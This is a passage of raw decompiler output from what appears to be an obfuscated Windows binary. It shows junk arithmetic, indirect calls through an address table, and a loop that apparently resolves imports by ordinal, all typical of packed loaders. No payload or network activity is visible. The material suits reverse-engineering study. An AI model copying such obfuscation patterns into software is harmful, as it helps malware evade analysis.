                  				_push(__esi);
                  				 *_t739 =  *_t739 ^ __esi;
                  				 *_t739 =  *_t739 | __ebx + 0x0041c174;
                  				_t419 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push(_t619);
                  				 *_t739 =  *_t739 - _t619;
                  				 *_t739 =  *_t739 + _t419;
                  				_push(__edi);
                  				 *_t739 =  *_t739 & 0x00000000;
                  				 *_t739 =  *_t739 + __ebx + 0x41c53c;
                  				_t421 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_t740 = _t739 - 0xfffffffc;
                  				 *(_t726 - 0x14) = _t619;
                  				_push((__ecx & 0x00000000 ^  *_t739) + _t421);
                  				_t622 =  *(_t726 - 0x14);
                  				_pop(_t422);
                  				 *(_t726 - 0x14) = _t422;
                  				_t425 =  *(_t726 - 0x14);
                  				if((0 ^  *(__ebx + 0x41c2dd)) > _t425) {
                  					 *__esp =  *__esp & 0x00000000;
                  					 *__esp =  *__esp + __ebx + 0x41c174;
                  					 *(__ebp - 0x14) =  *(__ebp - 0x14) & 0x00000000;
                  					 *__esp =  *__esp | __ebx + 0x0041c53c;
                  					 *((intOrPtr*)(__ebx + 0x41f064))( *(__ebp - 0x14), __ecx);
                  				}
                  				 *_t33 = _t425;
                  				 *_t35 =  *(_t726 - 0x14);
                  				while(1) {
                  					L5:
                  					 *_t36 =  *_t665;
                  					_t687 =  *(_t726 - 0x14);
                  					_t38 = _t551 + 0x41d32a; // 0x41d32a
                  					 *_t740 =  *_t740 & 0x00000000;
                  					 *_t740 =  *_t740 ^ _t38;
                  					_t39 = _t551 + 0x41cdb4; // 0x41cdb4
                  					 *_t740 =  *_t740 ^ _t726;
                  					 *_t740 = _t39;
                  					_t428 =  *((intOrPtr*)(_t551 + 0x41f068))(_t726, _t726);
                  					 *(_t551 + 0x41cada) =  *(_t551 + 0x41cada) & 0x00000000;
                  					 *(_t551 + 0x41cada) =  *(_t551 + 0x41cada) | _t622 & 0x00000000 ^ _t428;
                  					_t622 = _t622;
                  					while(1) {
                  						_t626 =  *_t740;
                  						 *_t740 =  *(_t665 + 0x10);
                  						_t47 = _t551 + 0x41c661; // 0x41c661
                  						 *_t740 =  *_t740 ^ _t726;
                  						 *_t740 =  *_t740 + _t47;
                  						_t430 =  *((intOrPtr*)(_t551 + 0x41f060))(_t622);
                  						 *_t740 = _t687;
                  						 *((intOrPtr*)(_t551 + 0x41d31e)) = _t430;
                  						_t690 = 0;
                  						 *_t50 = _t726;
                  						_t51 = _t551 + 0x41c5b3; // 0x41c5b3
                  						 *_t740 = _t51;
                  						_t432 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x10));
                  						 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  						 *_t740 =  *_t740 ^ _t432;
                  						_t57 = _t551 + 0x41c868; // 0x41c868
                  						 *_t740 =  *_t740 & 0x00000000;
                  						 *_t740 =  *_t740 ^ _t57;
                  						_t434 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x14));
                  						 *_t59 = _t665;
                  						_t573 = 0 ^  *(_t726 - 0x10);
                  						 *_t61 = _t434;
                  						 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t573;
                  						_push( *(_t726 - 0x14));
                  						_pop(_t435);
                  						_t667 = _t665;
                  						 *(_t726 - 0x14) = _t435;
                  						_t575 = _t573 & 0x00000000 ^ _t435 & 0x00000000 ^  *(_t551 + 0x41c633);
                  						_t438 =  *(_t726 - 0x14);
                  						if(_t575 > _t438) {
                  							_t68 = _t551 + 0x41c5b3; // 0x41c5b3
                  							 *_t740 = _t68;
                  							_t70 = _t551 + 0x41c868; // 0x41c868
                  							 *(_t726 - 0x10) =  *(_t726 - 0x10) & 0x00000000;
                  							 *_t740 =  *_t740 | _t70;
                  							_t438 =  *((intOrPtr*)(_t551 + 0x41f064))( *(_t726 - 0x10),  *(_t726 - 0x14));
                  						}
                  						 *(_t726 - 0x10) = _t626;
                  						 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) & 0x00000000;
                  						 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) | _t626 & 0x00000000 ^ _t438;
                  						_t629 =  *(_t726 - 0x10);
                  						 *(_t726 - 0x10) = _t551;
                  						_t554 =  *(_t726 - 0x10);
                  						 *_t740 =  *_t740 & 0x00000000;
                  						 *_t740 =  *_t740 | _t438 & 0x00000000 | _t551 & 0x00000000 ^  *(_t726 + 8);
                  						_t84 = _t554 + 0x41c812; // 0x41c812
                  						 *_t740 =  *_t740 & 0x00000000;
                  						 *_t740 =  *_t740 + _t84;
                  						_t85 = _t554 + 0x41ca65; // 0x41ca65
                  						 *_t740 =  *_t740 & 0x00000000;
                  						 *_t740 =  *_t740 | _t85;
                  						_t443 =  *((intOrPtr*)(_t554 + 0x41f068))(_t575, _t690);
                  						 *(_t726 - 0x14) = _t667;
                  						 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) & 0x00000000;
                  						 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) ^ (_t667 -  *(_t726 - 0x14) | _t443);
                  						_t670 =  *(_t726 - 0x14);
                  						 *_t94 = _t575;
                  						 *_t740 =  *_t740 ^ _t690;
                  						_push( *((intOrPtr*)(_t726 - 8)));
                  						_pop(_t691);
                  						 *((intOrPtr*)(_t726 - 8)) = _t691 +  *(_t726 - 0x10);
                  						_t693 = 0;
                  						_t98 = _t554 + 0x41d15d; // 0x41d15d
                  						 *_t740 =  *_t740 - _t575;
                  						 *_t740 = _t98;
                  						_t99 = _t554 + 0x41c260; // 0x41c260
                  						 *(_t726 - 0x10) = 0;
                  						 *_t740 =  *_t740 | _t99;
                  						_push( *((intOrPtr*)(_t554 + 0x41f068))( *(_t726 - 0x10), _t575));
                  						_pop( *_t103);
                  						_push( *(_t726 - 0x10));
                  						_pop( *_t105);
                  						_push( *((intOrPtr*)(_t670 + 0xc)));
                  						_pop( *_t107);
                  						_push( *(_t726 - 0x14));
                  						_pop(_t576);
                  						 *_t740 =  *_t740 & 0x00000000;
                  						 *_t740 =  *_t740 + _t576;
                  						_t109 = _t554 + 0x41ca52; // 0x41ca52
                  						 *_t740 =  *_t740 - _t554;
                  						 *_t740 =  *_t740 + _t109;
                  						_t449 =  *((intOrPtr*)(_t554 + 0x41f060))(_t554, _t554);
                  						 *(_t726 - 0x14) = _t629;
                  						 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) & 0x00000000;
                  						 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) | _t629 -  *(_t726 - 0x14) ^ _t449;
                  						_t632 =  *(_t726 - 0x14);
                  						_t741 = _t740 - 0xfffffffc;
                  						_push(0);
                  						 *_t741 =  *_t741 | _t449;
                  						_push( *_t740);
                  						_pop(_t450);
                  						 *_t741 = _t450 +  *(_t726 + 8);
                  						_t120 = _t554 + 0x41c07f; // 0x41c07f
                  						 *_t741 = _t120;
                  						_t454 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
                  						 *_t741 =  *_t741 - _t632;
                  						 *_t741 =  *_t741 | _t454;
                  						_t123 = _t554 + 0x41d248; // 0x41d248
                  						 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  						 *_t741 =  *_t741 | _t123;
                  						_t456 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x14), _t632);
                  						_t581 =  *_t741;
                  						_t742 =  &(_t741[1]);
                  						 *(_t726 - 0x10) = _t554;
                  						_push(_t581 + _t456);
                  						_t557 =  *(_t726 - 0x10);
                  						_pop(_t457);
                  						_t583 = _t581 & 0x00000000 ^ _t632 -  *_t742 ^  *(_t557 + 0x41d0e6);
                  						_t635 = _t632;
                  						if(_t583 > _t457) {
                  							_t131 = _t557 + 0x41c07f; // 0x41c07f
                  							 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  							 *_t742 =  *_t742 + _t131;
                  							_t135 = _t557 + 0x41d248; // 0x41d248
                  							 *(_t726 - 0x14) = 0;
                  							 *_t742 =  *_t742 | _t135;
                  							_t457 =  *((intOrPtr*)(_t557 + 0x41f064))( *(_t726 - 0x14),  *(_t726 - 0x14));
                  							 *(_t726 - 0x10) = _t693;
                  							 *((intOrPtr*)(_t557 + 0x41cd68)) = _t457;
                  							_t693 =  *(_t726 - 0x10);
                  						}
                  						_pop( *_t142);
                  						 *_t742 = _t583 & 0x00000000 ^  *(_t726 - 0x10);
                  						_t586 = _t693;
                  						_t694 = _t586 +  *(_t726 + 8);
                  						_t588 = 0;
                  						 *_t742 =  *_t742 & 0x00000000;
                  						 *_t742 =  *_t742 | _t588;
                  						_t145 = _t557 + 0x41d135; // 0x41d135
                  						 *_t742 = _t145;
                  						_t147 = _t557 + 0x41c60e; // 0x41c60e
                  						 *_t742 =  *_t742 & 0x00000000;
                  						 *_t742 =  *_t742 | _t147;
                  						_t460 =  *((intOrPtr*)(_t557 + 0x41f068))(_t588,  *(_t726 - 0x10), _t457);
                  						 *(_t726 - 0x14) = _t635;
                  						 *((intOrPtr*)(_t557 + 0x41c3e6)) = _t460;
                  						_t638 =  *(_t726 - 0x14);
                  						_t590 =  *_t742;
                  						_t743 = _t742 - 0xfffffffc;
                  						 *_t743 =  *_t743 - _t638;
                  						 *_t743 =  *_t743 ^ _t590;
                  						_t152 = _t557 + 0x41c220; // 0x41c220
                  						 *(_t726 - 0x14) = 0;
                  						 *_t743 =  *_t743 + _t152;
                  						_t462 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x14), _t638);
                  						 *(_t726 - 0x10) = _t590;
                  						 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) & 0x00000000;
                  						 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) ^ (_t590 ^  *(_t726 - 0x10) | _t462);
                  						_t463 =  *((intOrPtr*)(_t557 + 0x41f054))();
                  						 *(_t726 - 0x14) = 0;
                  						 *_t743 =  *_t743 + _t463;
                  						_t166 = _t557 + 0x41c49b; // 0x41c49b
                  						 *(_t726 - 0x10) = 0;
                  						 *_t743 =  *_t743 + _t166;
                  						_t465 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
                  						 *(_t726 - 0x14) = _t694;
                  						 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) & 0x00000000;
                  						 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) | _t694 & 0x00000000 ^ _t465;
                  						_t697 =  *(_t726 - 0x14);
                  						_t744 = _t743 - 0xfffffffc;
                  						 *(_t726 - 0x10) = _t638;
                  						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
                  						 *(_t726 - 4) =  *(_t726 - 4) ^ _t638 -  *(_t726 - 0x10) ^ _t465 & 0x00000000 ^  *_t743;
                  						_t641 =  *(_t726 - 0x10);
                  						_t183 = _t557 + 0x41c279; // 0x41c279
                  						 *_t744 = _t183;
                  						_t185 = _t557 + 0x41d1ea; // 0x41d1ea
                  						 *_t744 =  *_t744 - _t697;
                  						 *_t744 = _t185;
                  						_t470 =  *((intOrPtr*)(_t557 + 0x41f068))(_t697,  *(_t726 - 0x14));
                  						 *(_t726 - 0x14) =  *(_t726 - 0x10);
                  						 *(_t557 + 0x41cbc5) = 0 ^ _t470;
                  						_t596 =  *(_t726 - 0x14);
                  						do {
                  							L11:
                  							if(( *_t697 & 0x80000000) != 0) {
                  								_t744[1] =  *_t697;
                  								_t559 = _t557;
                  								 *_t744 =  *_t744 ^ _t697;
                  								 *_t744 =  *_t744 ^ _t559 + 0x0041d099;
                  								_t472 =  *((intOrPtr*)(_t559 + 0x41f060))(_t726);
                  								 *_t744 = _t596;
                  								 *(_t559 + 0x41c24c) = 0 ^ _t472;
                  								_t599 = 0;
                  								 *_t289 = _t697;
                  								 *_t744 =  *_t744 & 0x00000000;
                  								 *_t744 =  *_t744 + _t559 + 0x41cdd2;
                  								 *_t744 =  *_t744 & 0x00000000;
                  								 *_t744 =  *_t744 | _t559 + 0x0041c846;
                  								_t475 =  *((intOrPtr*)(_t559 + 0x41f068))(_t726, _t670);
                  								 *(_t726 - 0x10) = _t641;
                  								 *(_t559 + 0x41c9fe) = 0 ^ _t475;
                  								_t644 =  *(_t726 - 0x10);
                  								 *(_t726 - 0xc) =  *(_t726 - 0xc) & 0x0000ffff;
                  								 *_t744 =  *_t744 ^ _t644;
                  								 *_t744 =  *_t744 | _t559 + 0x0041c9e4;
                  								 *_t744 =  *_t744 & 0x00000000;
                  								 *_t744 =  *_t744 ^ _t559 + 0x0041c746;
                  								_t478 =  *((intOrPtr*)(_t559 + 0x41f068))(_t644, _t644);
                  								 *(_t726 - 0x14) = _t644;
                  								 *(_t559 + 0x41c559) =  *(_t559 + 0x41c559) & 0x00000000;
                  								 *(_t559 + 0x41c559) =  *(_t559 + 0x41c559) ^ (_t644 ^  *(_t726 - 0x14) | _t478);
                  								_t647 =  *(_t726 - 0x14);
                  							} else {
                  								_t192 = _t557 + 0x41c8e1; // 0x41c8e1
                  								 *_t744 =  *_t744 - _t641;
                  								 *_t744 =  *_t744 | _t192;
                  								_t512 =  *((intOrPtr*)(_t557 + 0x41f060))(_t641);
                  								 *(_t726 - 0x10) = 0;
                  								 *_t744 =  *_t744 | _t512;
                  								_t196 = _t557 + 0x41c6e2; // 0x41c6e2
                  								 *_t744 =  *_t744 - _t557;
                  								 *_t744 =  *_t744 | _t196;
                  								_t514 =  *((intOrPtr*)(_t557 + 0x41f060))(_t557,  *(_t726 - 0x10));
                  								_t610 = (_t596 & 0x00000000) +  *_t744;
                  								_t747 = _t744 - 0xfffffffc;
                  								 *_t747 =  *_t747 + _t670;
                  								_t676 = _t514;
                  								_t515 = _t676 + _t610;
                  								_t678 = 0;
                  								 *(_t726 - 0x10) = _t641;
                  								_t612 = _t610 & 0x00000000 ^ _t641 ^  *(_t726 - 0x10) ^  *(_t557 + 0x41c521);
                  								_t654 =  *(_t726 - 0x10);
                  								if(_t612 > _t515) {
                  									_t202 = _t557 + 0x41c8e1; // 0x41c8e1
                  									 *_t747 =  *_t747 & 0x00000000;
                  									 *_t747 =  *_t747 | _t202;
                  									_t203 = _t557 + 0x41c6e2; // 0x41c6e2
                  									 *_t747 = _t203;
                  									_t515 =  *((intOrPtr*)(_t557 + 0x41f064))( *(_t726 - 0x10), _t697);
                  								}
                  								 *(_t557 + 0x41c56c) =  *(_t557 + 0x41c56c) & 0x00000000;
                  								 *(_t557 + 0x41c56c) =  *(_t557 + 0x41c56c) ^ (_t726 & 0x00000000 | _t515);
                  								_t726 = _t726;
                  								 *_t747 =  *_t747 & 0x00000000;
                  								 *_t747 =  *_t747 + _t697;
                  								_t210 = _t557 + 0x41c266; // 0x41c266
                  								 *_t747 = _t210;
                  								_push( *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10), _t515));
                  								_pop( *_t213);
                  								_push( *(_t726 - 0x10));
                  								_pop( *_t215);
                  								_t714 =  *_t697;
                  								_t216 = _t557 + 0x41ce1f; // 0x41ce1f
                  								 *_t747 =  *_t747 & 0x00000000;
                  								 *_t747 =  *_t747 ^ _t216;
                  								_t519 =  *((intOrPtr*)(_t557 + 0x41f060))(_t714);
                  								 *(_t726 - 0x10) = 0;
                  								 *_t747 =  *_t747 ^ _t519;
                  								_t220 = _t557 + 0x41c0ad; // 0x41c0ad
                  								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  								 *_t747 =  *_t747 | _t220;
                  								_t521 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x10));
                  								_pop( *_t225);
                  								_t614 = _t612 & 0x00000000 |  *(_t726 - 0x14);
                  								 *_t227 = _t521;
                  								 *(_t726 - 0x10) =  *(_t726 - 0x10) + _t614;
                  								_push( *(_t726 - 0x10));
                  								_pop(_t522);
                  								_t656 = _t654;
                  								 *(_t726 - 0x10) = _t714;
                  								_t616 = _t614 & 0x00000000 | _t714 & 0x00000000 ^  *(_t557 + 0x41c765);
                  								_t717 =  *(_t726 - 0x10);
                  								if(_t616 > _t522) {
                  									_t234 = _t557 + 0x41ce1f; // 0x41ce1f
                  									 *_t747 = _t234;
                  									_t236 = _t557 + 0x41c0ad; // 0x41c0ad
                  									 *_t747 =  *_t747 & 0x00000000;
                  									 *_t747 =  *_t747 | _t236;
                  									_t522 =  *((intOrPtr*)(_t557 + 0x41f064))(_t726,  *(_t726 - 0x14));
                  								}
                  								 *_t747 = _t656;
                  								 *(_t557 + 0x41c497) = 0 ^ _t522;
                  								_t659 = 0;
                  								 *_t747 = _t678;
                  								_t679 = _t717;
                  								_t718 = _t679 +  *(_t726 + 8);
                  								_t681 = 0;
                  								_t240 = _t557 + 0x41d159; // 0x41d159
                  								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  								 *_t747 =  *_t747 ^ _t240;
                  								_t244 = _t557 + 0x41d213; // 0x41d213
                  								 *(_t726 - 0x10) = 0;
                  								 *_t747 =  *_t747 + _t244;
                  								_t525 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x10),  *(_t726 - 0x14));
                  								 *(_t726 - 0x14) = _t718;
                  								 *(_t557 + 0x41d182) =  *(_t557 + 0x41d182) & 0x00000000;
                  								 *(_t557 + 0x41d182) =  *(_t557 + 0x41d182) ^ (_t718 ^  *(_t726 - 0x14) | _t525);
                  								_t599 = _t616;
                  								_t255 = _t557 + 0x41c85c; // 0x41c85c
                  								 *_t747 =  *_t747 & 0x00000000;
                  								 *_t747 =  *_t747 | _t255;
                  								_t256 = _t557 + 0x41c10e; // 0x41c10e
                  								 *_t747 = _t256;
                  								_t528 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x14), _t659);
                  								 *(_t557 + 0x41ce00) =  *(_t557 + 0x41ce00) & 0x00000000;
                  								 *(_t557 + 0x41ce00) =  *(_t557 + 0x41ce00) | _t659 & 0x00000000 | _t528;
                  								_t662 = _t659;
                  								_push( *(_t726 - 0x14) + 2);
                  								_pop( *_t263);
                  								_push( *(_t726 - 0x14));
                  								_pop( *_t265);
                  								_t266 = _t557 + 0x41c9a3; // 0x41c9a3
                  								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  								 *_t747 =  *_t747 ^ _t266;
                  								_t270 = _t557 + 0x41d1fa; // 0x41d1fa
                  								 *_t747 = _t270;
                  								_t531 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x14),  *(_t726 - 0x14));
                  								 *_t747 = _t662;
                  								 *((intOrPtr*)(_t557 + 0x41d0fe)) = _t531;
                  								_t647 = 0;
                  								_t697 = 0 ^  *_t747;
                  								_t744 =  &(_t747[1]);
                  								_t274 = _t557 + 0x41d0af; // 0x41d0af
                  								 *_t744 =  *_t744 & 0x00000000;
                  								 *_t744 =  *_t744 | _t274;
                  								_t275 = _t557 + 0x41ceae; // 0x41ceae
                  								 *_t744 = _t275;
                  								_t478 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x10), _t599);
                  								 *(_t726 - 0x10) = _t681;
                  								 *(_t557 + 0x41c8cd) =  *(_t557 + 0x41c8cd) & 0x00000000;
                  								 *(_t557 + 0x41c8cd) =  *(_t557 + 0x41c8cd) ^ _t681 -  *(_t726 - 0x10) ^ _t478;
                  								_t670 =  *(_t726 - 0x10);
                  							}
                  							 *(_t726 - 0x10) = _t559;
                  							_t562 =  *(_t726 - 0x10);
                  							_t312 = _t562 + 0x41cb0b; // 0x41cb0b
                  							 *(_t726 - 0x14) = 0;
                  							 *_t744 =  *_t744 | _t312;
                  							_t482 =  *((intOrPtr*)(_t562 + 0x41f060))( *(_t726 - 0x14));
                  							 *_t744 = _t482;
                  							_t317 = _t562 + 0x41cda5; // 0x41cda5
                  							 *_t744 = _t317;
                  							_t484 =  *((intOrPtr*)(_t562 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x10));
                  							_t745 = _t744 - 0xfffffffc;
                  							 *_t745 =  *_t745 ^ _t726;
                  							_t727 = _t484;
                  							_t485 = _t727 +  *_t744;
                  							_t729 = 0;
                  							 *(_t729 - 0x14) = _t697;
                  							_t602 =  *(_t562 + 0x41c96a);
                  							_t700 =  *(_t729 - 0x14);
                  							if(_t602 > _t485) {
                  								_t323 = _t562 + 0x41cb0b; // 0x41cb0b
                  								 *_t745 =  *_t745 & 0x00000000;
                  								 *_t745 =  *_t745 | _t323;
                  								_t324 = _t562 + 0x41cda5; // 0x41cda5
                  								 *(_t729 - 0x14) =  *(_t729 - 0x14) & 0x00000000;
                  								 *_t745 =  *_t745 | _t324;
                  								_t485 =  *((intOrPtr*)(_t562 + 0x41f064))( *(_t729 - 0x14), _t729);
                  							}
                  							 *_t329 = _t485;
                  							 *_t331 =  *(_t729 - 0x10);
                  							_t745[1] =  *(_t729 - 0xc);
                  							_t564 = _t562;
                  							_t334 = _t564 + 0x41cee2; // 0x41cee2
                  							 *_t745 = _t334;
                  							_t336 = _t564 + 0x41d33a; // 0x41d33a
                  							 *(_t729 - 0x14) = 0;
                  							 *_t745 =  *_t745 | _t336;
                  							_t488 =  *((intOrPtr*)(_t564 + 0x41f068))( *(_t729 - 0x14),  *(_t729 - 0x10), _t602);
                  							 *(_t564 + 0x41d1da) =  *(_t564 + 0x41d1da) & 0x00000000;
                  							 *(_t564 + 0x41d1da) =  *(_t564 + 0x41d1da) | _t700 -  *_t745 | _t488;
                  							_t703 = _t700;
                  							 *(_t729 - 0x10) = _t670;
                  							_t673 =  *(_t729 - 0x10);
                  							 *_t745 =  *_t745 - _t647;
                  							 *_t745 =  *_t745 ^ (_t488 & 0x00000000 | _t670 ^  *(_t729 - 0x10) |  *(_t729 - 4));
                  							_t348 = _t564 + 0x41d2b3; // 0x41d2b3
                  							 *_t745 =  *_t745 - _t647;
                  							 *_t745 = _t348;
                  							_t349 = _t564 + 0x41cb87; // 0x41cb87
                  							 *(_t729 - 0x10) =  *(_t729 - 0x10) & 0x00000000;
                  							 *_t745 =  *_t745 + _t349;
                  							_t493 =  *((intOrPtr*)(_t564 + 0x41f068))( *(_t729 - 0x10), _t647, _t647);
                  							 *(_t729 - 0x10) = _t602;
                  							 *(_t564 + 0x41cf9a) =  *(_t564 + 0x41cf9a) & 0x00000000;
                  							 *(_t564 + 0x41cf9a) =  *(_t564 + 0x41cf9a) | _t602 ^  *(_t729 - 0x10) | _t493;
                  							_t605 =  *(_t729 - 0x10);
                  							_t746 =  &(_t745[1]);
                  							 *(_t729 - 0x10) = 0;
                  							 *_t746 =  *_t746 ^  *_t745;
                  							_t363 = _t564 + 0x41c922; // 0x41c922
                  							 *(_t729 - 0x10) = 0;
                  							 *_t746 =  *_t746 | _t363;
                  							_t366 = _t564 + 0x41c97d; // 0x41c97d
                  							 *_t746 =  *_t746 & 0x00000000;
                  							 *_t746 =  *_t746 + _t366;
                  							_t498 =  *((intOrPtr*)(_t564 + 0x41f068))(_t605,  *(_t729 - 0x10),  *(_t729 - 0x10));
                  							 *(_t564 + 0x41cae1) =  *(_t564 + 0x41cae1) & 0x00000000;
                  							 *(_t564 + 0x41cae1) =  *(_t564 + 0x41cae1) | _t729 & 0x00000000 | _t498;
                  							_t726 = _t729;
                  							_t499 =  *((intOrPtr*)(_t564 + 0x41f050))();
                  							 *(_t726 - 0x14) = 0;
                  							 *_t746 =  *_t746 + _t499;
                  							_t375 = _t564 + 0x41c197; // 0x41c197
                  							 *(_t726 - 0x14) = 0;
                  							 *_t746 =  *_t746 | _t375;
                  							_t501 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x14));
                  							 *(_t726 - 0x14) = 0;
                  							 *_t746 =  *_t746 | _t501;
                  							_t381 = _t564 + 0x41c46f; // 0x41c46f
                  							 *(_t726 - 0x14) = 0;
                  							 *_t746 =  *_t746 ^ _t381;
                  							_t503 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x14));
                  							_pop( *_t385);
                  							_t607 = (_t605 & 0x00000000) +  *(_t726 - 0x10);
                  							 *_t387 = _t503;
                  							 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t607;
                  							_push( *(_t726 - 0x14));
                  							_pop(_t504);
                  							_t566 = _t564;
                  							 *(_t726 - 0x10) = _t673;
                  							_t596 = _t607 & 0x00000000 ^ _t673 -  *(_t726 - 0x10) ^  *(_t566 + 0x41c9d0);
                  							_t670 =  *(_t726 - 0x10);
                  							if(_t596 > _t504) {
                  								_t395 = _t566 + 0x41c197; // 0x41c197
                  								 *_t746 =  *_t746 & 0x00000000;
                  								 *_t746 =  *_t746 + _t395;
                  								_t396 = _t566 + 0x41c46f; // 0x41c46f
                  								 *(_t726 - 0x10) = 0;
                  								 *_t746 =  *_t746 ^ _t396;
                  								_t504 =  *((intOrPtr*)(_t566 + 0x41f064))( *(_t726 - 0x10), _t703);
                  								 *(_t566 + 0x41cfe1) =  *(_t566 + 0x41cfe1) & 0x00000000;
                  								 *(_t566 + 0x41cfe1) =  *(_t566 + 0x41cfe1) | _t726 ^  *_t746 ^ _t504;
                  								_t726 = _t726;
                  							}
                  							_t744 =  &(_t746[1]);
                  							 *_t744 =  *_t744 ^ _t726;
                  							 *_t744 = _t703;
                  							 *_t744 = _t504 & 0x00000000 |  *_t746;
                  							_t509 = 0;
                  							 *_t744 = _t647;
                  							 *((intOrPtr*)( *((intOrPtr*)(_t726 - 8)))) = _t509;
                  							_t650 = 0;
                  							 *_t405 = _t726;
                  							 *_t744 = 4;
                  							_t510 = _t566;
                  							 *_t407 = 0 ^  *(_t726 - 0x14);
                  							 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t510;
                  							_push( *(_t726 - 0x14));
                  							_pop(_t697);
                  							_t641 = _t650;
                  							 *_t412 =  *((intOrPtr*)(_t726 - 8));
                  							 *(_t726 - 0x10) =  *(_t726 - 0x10) + _t510;
                  							_push( *(_t726 - 0x10));
                  							_pop( *_t416);
                  							_t557 = _t566;
                  						} while ( *_t697 != 0);
                  						_t665 = _t670 + 0x14;
                  						_t686 = _t697;
                  						if( *_t665 != 0 ||  *(_t665 + 0x10) != 0) {
                  							if( *_t665 != 0) {
                  								goto L5;
                  							} else {
                  								_t10 = _t557 + 0x41d076; // 0x41d076
                  								 *(_t726 - 0x10) = 0;
                  								 *_t744 =  *_t744 | _t10;
                  								_t539 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10));
                  								 *(_t726 - 0x14) = _t686;
                  								 *(_t557 + 0x41d0ee) = 0 ^ _t539;
                  								_push( *(_t665 + 0x10));
                  								_pop( *_t18);
                  								_push( *(_t726 - 0x10));
                  								_pop(_t687);
                  								_t20 = _t557 + 0x41c2b0; // 0x41c2b0
                  								 *_t744 = _t20;
                  								_t541 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10));
                  								 *(_t557 + 0x41c1b3) =  *(_t557 + 0x41c1b3) & 0x00000000;
                  								 *(_t557 + 0x41c1b3) =  *(_t557 + 0x41c1b3) | _t726 ^  *_t744 | _t541;
                  								_t726 = _t726;
                  							}
                  							_t626 =  *_t740;
                  							 *_t740 =  *(_t665 + 0x10);
                  							_t47 = _t551 + 0x41c661; // 0x41c661
                  							 *_t740 =  *_t740 ^ _t726;
                  							 *_t740 =  *_t740 + _t47;
                  							_t430 =  *((intOrPtr*)(_t551 + 0x41f060))(_t622);
                  							 *_t740 = _t687;
                  							 *((intOrPtr*)(_t551 + 0x41d31e)) = _t430;
                  							_t690 = 0;
                  							 *_t50 = _t726;
                  							_t51 = _t551 + 0x41c5b3; // 0x41c5b3
                  							 *_t740 = _t51;
                  							_t432 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x10));
                  							 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
                  							 *_t740 =  *_t740 ^ _t432;
                  							_t57 = _t551 + 0x41c868; // 0x41c868
                  							 *_t740 =  *_t740 & 0x00000000;
                  							 *_t740 =  *_t740 ^ _t57;
                  							_t434 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x14));
                  							 *_t59 = _t665;
                  							_t573 = 0 ^  *(_t726 - 0x10);
                  							 *_t61 = _t434;
                  							 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t573;
                  							_push( *(_t726 - 0x14));
                  							_pop(_t435);
                  							_t667 = _t665;
                  							 *(_t726 - 0x14) = _t435;
                  							_t575 = _t573 & 0x00000000 ^ _t435 & 0x00000000 ^  *(_t551 + 0x41c633);
                  							_t438 =  *(_t726 - 0x14);
                  							if(_t575 > _t438) {
                  								_t68 = _t551 + 0x41c5b3; // 0x41c5b3
                  								 *_t740 = _t68;
                  								_t70 = _t551 + 0x41c868; // 0x41c868
                  								 *(_t726 - 0x10) =  *(_t726 - 0x10) & 0x00000000;
                  								 *_t740 =  *_t740 | _t70;
                  								_t438 =  *((intOrPtr*)(_t551 + 0x41f064))( *(_t726 - 0x10),  *(_t726 - 0x14));
                  							}
                  							 *(_t726 - 0x10) = _t626;
                  							 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) & 0x00000000;
                  							 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) | _t626 & 0x00000000 ^ _t438;
                  							_t629 =  *(_t726 - 0x10);
                  							 *(_t726 - 0x10) = _t551;
                  							_t554 =  *(_t726 - 0x10);
                  							 *_t740 =  *_t740 & 0x00000000;
                  							 *_t740 =  *_t740 | _t438 & 0x00000000 | _t551 & 0x00000000 ^  *(_t726 + 8);
